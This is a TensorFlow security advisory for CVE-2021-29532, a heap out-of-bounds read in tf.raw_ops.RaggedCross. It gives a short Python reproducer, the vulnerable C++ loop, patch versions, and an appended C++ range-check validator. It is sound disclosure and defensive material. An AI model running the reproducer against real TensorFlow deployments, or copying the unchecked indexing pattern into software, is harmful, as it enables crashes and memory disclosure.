## TFSA-2021-021: Heap out of bounds read in `RaggedCross`

### CVE Number
CVE-2021-29532

### Impact
An attacker can force accesses outside the bounds of heap-allocated arrays by
passing in invalid tensor values to `tf.raw_ops.RaggedCross`:

```python
import tensorflow as tf

ragged_values = []
ragged_row_splits = []
sparse_indices = []
sparse_values = []
sparse_shape = []

dense_inputs_elem = tf.constant([], shape=[92, 0], dtype=tf.int64)
dense_inputs = [dense_inputs_elem]

input_order = "R"
hashed_output = False
num_buckets = 0
hash_key = 0

tf.raw_ops.RaggedCross(ragged_values=ragged_values,
                       ragged_row_splits=ragged_row_splits,
                       sparse_indices=sparse_indices,
                       sparse_values=sparse_values,
                       sparse_shape=sparse_shape,
                       dense_inputs=dense_inputs,
                       input_order=input_order,
                       hashed_output=hashed_output,
                       num_buckets=num_buckets,
                       hash_key=hash_key,
                       out_values_type=tf.int64,
                       out_row_splits_type=tf.int64)
```

This is because the
[implementation](https://github.com/tensorflow/tensorflow/blob/efea03b38fb8d3b81762237dc85e579cc5fc6e87/tensorflow/core/kernels/ragged_cross_op.cc#L456-L487)
lacks validation for the user-supplied arguments:

```cc
int next_ragged = 0;
int next_sparse = 0;
int next_dense = 0;
for (char c : input_order_) {
  if (c == 'R') {
    TF_RETURN_IF_ERROR(BuildRaggedFeatureReader(
        ragged_values_list[next_ragged], ragged_splits_list[next_ragged],
        features));
    next_ragged++;
  } else if (c == 'S') {
    TF_RETURN_IF_ERROR(BuildSparseFeatureReader(
        sparse_indices_list[next_sparse], sparse_values_list[next_sparse],
        batch_size, features));
    next_sparse++;
  } else if (c == 'D') {
    TF_RETURN_IF_ERROR(
        BuildDenseFeatureReader(dense_list[next_dense++], features));
  }
  ...
}
```

Each of the above branches calls a helper function after accessing array elements
via a `*_list[next_*]` pattern, followed by incrementing the `next_*` index.
However, as there is no validation that the `next_*` values are in the valid
range for the corresponding `*_list` arrays, this results in heap OOB reads.

### Patches
We have patched the issue in GitHub commit
[44b7f486c0143f68b56c34e2d01e146ee445134a](https://github.com/tensorflow/tensorflow/commit/44b7f486c0143f68b56c34e2d01e146ee445134a).

The fix will be included in TensorFlow 2.5.0. We will also cherrypick this
commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow
2.1.4, as these are also affected and still in supported range.

### For more information
Please consult [our security
guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for
more information regarding the security model and how to contact us with issues
and questions.

### Attribution
This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.
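
The missing range check described under Impact, written as a standalone C++ validator that walks `input_order` and compares each `next_*` index against the length of the list it would index. This is an added example, not TensorFlow's code and not the patch in the commit above; `CrossInputs`, `TooShort` and `ValidateInputOrder` are hypothetical names, and rejecting unknown `input_order` characters is an assumption made here.

```cpp
#include <cstddef>
#include <string>

// Hypothetical stand-in for the kernel's input lists; only their lengths matter.
struct CrossInputs {
  std::size_t ragged_values, ragged_splits;   // ragged_values_list, ragged_splits_list
  std::size_t sparse_indices, sparse_values;  // sparse_indices_list, sparse_values_list
  std::size_t dense;                          // dense_list
};

static std::string TooShort(const char* kind, std::size_t idx) {
  return std::string("input_order reads ") + kind + " input at index " +
         std::to_string(idx) + ", past the end of the supplied list";
}

// Walks input_order the way the kernel loop does, but checks each next_* index
// against the list lengths first. Returns "" if every access would be in range.
std::string ValidateInputOrder(const std::string& input_order,
                               const CrossInputs& in) {
  std::size_t next_ragged = 0, next_sparse = 0, next_dense = 0;
  for (char c : input_order) {
    if (c == 'R') {
      if (next_ragged >= in.ragged_values || next_ragged >= in.ragged_splits)
        return TooShort("ragged", next_ragged);
      ++next_ragged;
    } else if (c == 'S') {
      if (next_sparse >= in.sparse_indices || next_sparse >= in.sparse_values)
        return TooShort("sparse", next_sparse);
      ++next_sparse;
    } else if (c == 'D') {
      if (next_dense >= in.dense) return TooShort("dense", next_dense);
      ++next_dense;
    } else {
      // Assumption of this example: any other character is rejected.
      return std::string("unexpected input_order character '") + c + "'";
    }
  }
  return "";
}

int main() {
  // Constructed input mirroring the reproducer: input_order "R", no ragged
  // tensors, one dense tensor.
  CrossInputs poc{0, 0, 0, 0, 1};
  return ValidateInputOrder("R", poc).empty() ? 1 : 0;
}
```

With the reproducer's shape (`input_order = "R"`, empty ragged lists, one dense input) the validator returns an error before any list element is touched.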